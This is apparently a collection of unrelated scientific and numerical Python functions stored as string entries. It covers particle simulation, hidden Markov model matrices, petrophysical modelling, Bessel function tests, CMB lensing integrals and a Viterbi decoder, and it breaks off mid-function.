inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def exercise_b2_113():\r\n pass", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) 